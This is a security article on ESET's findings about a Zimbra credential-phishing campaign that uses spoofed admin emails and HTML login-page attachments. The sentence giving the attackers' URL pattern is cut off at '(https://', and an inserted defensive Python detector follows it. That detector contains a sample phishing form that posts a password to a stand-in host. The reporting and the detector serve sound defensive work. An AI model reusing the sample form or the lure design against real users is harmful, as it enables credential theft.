A new phishing campaign has been uncovered by ESET researchers, targeting users of the Zimbra Collaboration email server. The campaign, which has been active since April 2023 and is still ongoing, aims to collect the credentials of Zimbra account users. Zimbra Collaboration is a popular alternative to enterprise email solutions and is used by small and medium businesses as well as governmental entities.
ESET telemetry data shows that the campaign’s primary targets are located in Poland, followed by Ecuador and Italy. The adversaries do not focus on any specific industry vertical, but rather target organizations that are using Zimbra. So far, the researchers have not been able to attribute this campaign to any known threat actors.
The phishing emails used in this campaign carry an HTML file as an attachment. The email typically warns the recipient about an email server update, account deactivation, or a similar issue, and instructs them to open the attached file. The From: field of the email is spoofed to appear as if it comes from an email server administrator, adding to its apparent authenticity.
When the attachment is opened, the user is presented with a fake Zimbra login page that is customized according to the targeted organization. The HTML file is opened in the victim’s browser, making it appear as if they have been directed to the legitimate login page. However, the URL actually points to a local file path. The login form even has the Username field pre-filled, making it look more legitimate.
Unbeknownst to the victim, their entered credentials are collected from the HTML form and sent via an HTTPS POST request to a server controlled by the attackers. The URL pattern used for the POST request destination is (https://
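The attachment described above is a self-contained HTML login form that captures the password and submits it by HTTPS POST to a host the attackers control. The following is an added example, not ESET's tooling or anything from the campaign, of a triage check a mail gateway or analyst could run over such an attachment: it flags any form that takes a password and posts it to an absolute URL whose host is not one of the organisation's own webmail hosts, and reports the pre-filled username the lure used. The trusted host list, the input names checked and the sample page are assumptions.

```python
# Added example (not ESET's tooling): flag a detached HTML attachment whose
# login form captures a password and POSTs it to an absolute URL outside the
# organisation's own webmail hosts, as the campaign above does. The trusted
# host list, the input names checked and the sample page are assumptions.
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_HOSTS = {"mail.example.org"}  # assumed legitimate webmail host(s)


class _FormScanner(HTMLParser):
    """Collects each <form>'s action, whether it has a password input,
    and any pre-filled username value (the lure pre-fills it)."""

    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # attribute values may be None
        if tag == "form":
            self._cur = {"action": a.get("action", ""), "pw": False, "user": ""}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None:
            if a.get("type", "").lower() == "password":
                self._cur["pw"] = True
            elif a.get("name", "").lower() in ("username", "user", "email"):
                self._cur["user"] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None


def find_harvesting_forms(html_text, trusted_hosts=TRUSTED_HOSTS):
    """Return (action_url, prefilled_username) for every form that takes a
    password and submits it to a host not in trusted_hosts."""
    p = _FormScanner()
    p.feed(html_text)
    hits = []
    for f in p.forms:
        host = urlparse(f["action"]).hostname  # None for relative actions
        if f["pw"] and host and host not in trusted_hosts:
            hits.append((f["action"], f["user"]))
    return hits


# Constructed sample imitating the described lure; host and user are placeholders.
SAMPLE = ('<html><body><form method="post" action="https://collector.invalid/z/">'
          '<input name="username" value="jdoe@example.org">'
          '<input type="password" name="password"></form></body></html>')
```

Running `find_harvesting_forms(SAMPLE)` returns one hit naming the external action URL and the pre-filled address; a form posting to a host in `TRUSTED_HOSTS`, or one without a password field, is not reported.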
Interestingly, ESET researchers have observed instances where subsequent waves of phishing emails were sent from Zimbra accounts of previously targeted legitimate companies. This suggests that the attackers were able to compromise the administrator accounts of these companies and create new mailboxes to send phishing emails to other targets. It is suspected that the attackers relied on password reuse by the targeted administrators, using the same credentials for both email and administration purposes.
While this campaign relies solely on social engineering and user interaction, similar phishing campaigns have employed more sophisticated techniques. In one previous campaign described by Proofpoint, an APT group known as Winter Vivern exploited a vulnerability in webmail portals to target military, government, and diplomatic entities. Another example involved a group called TEMP_Heretic, which abused a vulnerability in the Calendar feature of Zimbra Collaboration to exfiltrate emails from European government and media organizations.
The current campaign may not be technologically advanced, but it is still able to spread and compromise organizations that use Zimbra Collaboration. Because the HTML attachments contain otherwise legitimate code, the phishing emails are harder for traditional antispam policies to detect. As Zimbra Collaboration is often used by organizations with lower IT budgets, it remains an attractive target for adversaries.
In conclusion, this phishing campaign targeting users of Zimbra Collaboration is an ongoing threat that organizations using this email server should be aware of. It is important for users to be cautious of emails that request them to click on attachments and provide their login credentials. Organizations should also consider implementing multi-factor authentication and regularly updating their systems to protect against known vulnerabilities.